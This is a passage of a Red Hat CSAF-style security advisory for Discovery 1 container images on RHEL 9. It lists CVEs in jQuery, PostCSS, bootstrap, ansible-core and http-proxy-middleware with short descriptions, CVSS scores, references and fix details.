"pkg:oci/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a?arch=amd64&repository_url=registry.redhat.io/discovery/discovery-ui-rhel9&tag=1.12.0-1", }, }, }, ], category: "architecture", name: "amd64", }, { branches: [ { category: "product_version", name: "discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", product: { name: "discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", product_id: "discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", product_identification_helper: { purl: "pkg:oci/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70?arch=arm64&repository_url=registry.redhat.io/discovery/discovery-server-rhel9&tag=1.12.0-1", }, }, }, { category: "product_version", name: "discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", product: { name: "discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", product_id: "discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", product_identification_helper: { purl: "pkg:oci/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c?arch=arm64&repository_url=registry.redhat.io/discovery/discovery-ui-rhel9&tag=1.12.0-1", }, }, }, ], category: "architecture", name: "arm64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64 as a component of Discovery 1 for RHEL 9", product_id: "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", }, product_reference: "discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", relates_to_product_reference: "9Base-discovery-1", }, { category: "default_component_of", full_product_name: { name: "discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64 as a component of Discovery 1 for RHEL 9", product_id: "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", }, product_reference: "discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", relates_to_product_reference: "9Base-discovery-1", }, { category: "default_component_of", full_product_name: { name: "discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64 as a component of Discovery 1 for RHEL 9", product_id: "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", }, product_reference: "discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", relates_to_product_reference: "9Base-discovery-1", }, { category: "default_component_of", full_product_name: { name: "discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64 as a component of Discovery 1 for RHEL 9", product_id: "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", }, product_reference: "discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", relates_to_product_reference: "9Base-discovery-1", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11023", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2020-06-23T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "1850004", }, ], notes: [ { category: "description", text: "A flaw was found in jQuery. HTML containing \\<option\\> elements from untrusted sources are passed, even after sanitizing, to one of jQuery's DOM manipulation methods, which may execute untrusted code. The highest threat from this vulnerability is to data confidentiality and integrity.", title: "Vulnerability description", }, { category: "summary", text: "jquery: Untrusted code execution via <option> tag in HTML passed to DOM manipulation methods", title: "Vulnerability summary", }, { category: "other", text: "Red Hat Enterprise Linux versions 6, 7, and 8 ship a vulnerable version of JQuery in the `pcs` component. As PCS does not accept untrusted input, the vulnerable code cannot be controlled by an attacker.\n\nMultiple Red Hat offerings use doxygen to build documentation. During this process an affected jquery.js file can be included in the resulting package. The 'gcc' and 'tbb' packages were potentially vulnerable via this method.\n\nOpenShift Container Platform 4 is not affected because even though it uses the 'gcc' component, vulnerable code is limited within the libstdc++-docs rpm package, which is not shipped.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2020-11023", }, { category: "external", summary: "RHBZ#1850004", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1850004", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2020-11023", url: "https://www.cve.org/CVERecord?id=CVE-2020-11023", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2020-11023", url: "https://nvd.nist.gov/vuln/detail/CVE-2020-11023", }, { category: "external", summary: "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/", url: "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/", }, { category: "external", summary: "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", url: "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", }, ], release_date: "2020-04-29T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "workaround", details: "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "exploit_status", date: "2025-01-23T00:00:00+00:00", details: "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog", }, { category: "impact", details: "Moderate", }, ], title: "jquery: Untrusted code execution via <option> tag in HTML passed to DOM manipulation methods", }, { cve: "CVE-2023-44270", cwe: { id: "CWE-93", name: "Improper Neutralization of CRLF Sequences ('CRLF Injection')", }, discovery_date: "2024-11-18T14:11:50.400987+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2326998", }, ], notes: [ { category: "description", text: "An issue was discovered in PostCSS before 8.4.31. The vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being included in a comment.", title: "Vulnerability description", }, { category: "summary", text: "PostCSS: Improper input validation in PostCSS", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2023-44270", }, { category: "external", summary: "RHBZ#2326998", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2326998", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2023-44270", url: "https://www.cve.org/CVERecord?id=CVE-2023-44270", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2023-44270", url: "https://nvd.nist.gov/vuln/detail/CVE-2023-44270", }, { category: "external", summary: "https://github.com/github/advisory-database/issues/2820", url: "https://github.com/github/advisory-database/issues/2820", }, { category: "external", summary: "https://github.com/postcss/postcss/blob/main/lib/tokenize.js#L25", url: "https://github.com/postcss/postcss/blob/main/lib/tokenize.js#L25", }, { category: "external", summary: "https://github.com/postcss/postcss/commit/58cc860b4c1707510c9cd1bc1fa30b423a9ad6c5", url: "https://github.com/postcss/postcss/commit/58cc860b4c1707510c9cd1bc1fa30b423a9ad6c5", }, { category: "external", summary: "https://github.com/postcss/postcss/releases/tag/8.4.31", url: "https://github.com/postcss/postcss/releases/tag/8.4.31", }, ], release_date: "2023-09-29T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "workaround", details: "There's no known mitigation for this issue. Red Hat recommends to not parse untrusted CSS input using PostCSS.", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "PostCSS: Improper input validation in PostCSS", }, { cve: "CVE-2024-6485", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-07-11T17:30:47+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2297388", }, ], notes: [ { category: "description", text: "A vulnerability was found in bootstrap associated with the data-loading-text attribute within the button plugin. This vulnerability allows malicious JavaScript code to be injected into the attribute, which is then executed when the button's loading state is triggered.", title: "Vulnerability description", }, { category: "summary", text: "bootstrap: Cross-Site Scripting via button plugin on bootstrap", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-6485", }, { category: "external", summary: "RHBZ#2297388", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2297388", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-6485", url: "https://www.cve.org/CVERecord?id=CVE-2024-6485", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-6485", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-6485", }, { category: "external", summary: "https://www.herodevs.com/vulnerability-directory/cve-2024-6485", url: "https://www.herodevs.com/vulnerability-directory/cve-2024-6485", }, ], release_date: "2024-07-11T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 6.4, baseSeverity: "MEDIUM", confidentialityImpact: "HIGH", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:L", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "bootstrap: Cross-Site Scripting via button plugin on bootstrap", }, { cve: "CVE-2024-8775", cwe: { id: "CWE-532", name: "Insertion of Sensitive Information into Log File", }, discovery_date: "2024-09-13T08:31:27.781000+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2312119", }, ], notes: [ { category: "description", text: "A flaw was found in Ansible, where sensitive information stored in Ansible Vault files can be exposed in plaintext during the execution of a playbook. This occurs when using tasks such as include_vars to load vaulted variables without setting the no_log: true parameter, resulting in sensitive data being printed in the playbook output or logs. This can lead to the unintentional disclosure of secrets like passwords or API keys, compromising security and potentially allowing unauthorized access or actions.", title: "Vulnerability description", }, { category: "summary", text: "ansible-core: Exposure of Sensitive Information in Ansible Vault Files Due to Improper Logging", title: "Vulnerability summary", }, { category: "other", text: "This issue is classified as moderate rather than important because while it does expose sensitive information during playbook execution, the exposure is limited to logs and output generated during the run, which is typically accessible only to authorized users with sufficient privileges. The flaw does not result in an immediate or direct compromise of systems, as no remote exploitation vector is introduced. Additionally, the risk can be mitigated through proper configuration (`no_log: true`) and access control measures, reducing the likelihood of unauthorized access to the logged data. However, the unintentional disclosure of secrets like passwords or API keys still presents a potential risk for privilege escalation or lateral movement within an environment, justifying a moderate severity rating.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-8775", }, { category: "external", summary: "RHBZ#2312119", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312119", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-8775", url: "https://www.cve.org/CVERecord?id=CVE-2024-8775", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-8775", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-8775", }, { category: "external", summary: "https://github.com/advisories/GHSA-jpxc-vmjf-9fcj", url: "https://github.com/advisories/GHSA-jpxc-vmjf-9fcj", }, ], release_date: "2024-09-13T08:35:00+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "LOCAL", availabilityImpact: "NONE", baseScore: 5.5, baseSeverity: "MEDIUM", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "ansible-core: Exposure of Sensitive Information in Ansible Vault Files Due to Improper Logging", }, { cve: "CVE-2024-21536", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2024-10-19T06:00:36.846953+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2319884", }, ], notes: [ { category: "description", text: "A flaw was found in the http-proxy-middleware package. Affected versions of this package are vulnerable to denial of service (DoS) due to an UnhandledPromiseRejection error thrown by micromatch. This flaw allows an attacker to kill the Node.js process and crash the server by requesting certain paths.", title: "Vulnerability description", }, { category: "summary", text: "http-proxy-middleware: Denial of Service", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-21536", }, { category: "external", summary: "RHBZ#2319884", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2319884", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-21536", url: "https://www.cve.org/CVERecord?id=CVE-2024-21536", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-21536", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-21536", }, { category: "external", summary: "https://gist.github.com/mhassan1/28be67266d82a53708ed59ce5dc3c94a", url: "https://gist.github.com/mhassan1/28be67266d82a53708ed59ce5dc3c94a", }, { category: "external", summary: "https://github.com/chimurai/http-proxy-middleware/commit/0b4274e8cc9e9a2c5a06f35fbf456ccfcebc55a5", url: "https://github.com/chimurai/http-proxy-middleware/commit/0b4274e8cc9e9a2c5a06f35fbf456ccfcebc55a5", }, { category: "external", summary: "https://github.com/chimurai/http-proxy-middleware/commit/788b21e4aff38332d6319557d4a5b1b13b1f9a22", url: "https://github.com/chimurai/http-proxy-middleware/commit/788b21e4aff38332d6319557d4a5b1b13b1f9a22", }, { category: "external", summary: "https://security.snyk.io/vuln/SNYK-JS-HTTPPROXYMIDDLEWARE-8229906", url: "https://security.snyk.io/vuln/SNYK-JS-HTTPPROXYMIDDLEWARE-8229906", }, ], release_date: "2024-10-19T05:00:04.056000+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "workaround", details: "Red Hat Product Security does not have any mitigation recommendations at this time.", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: 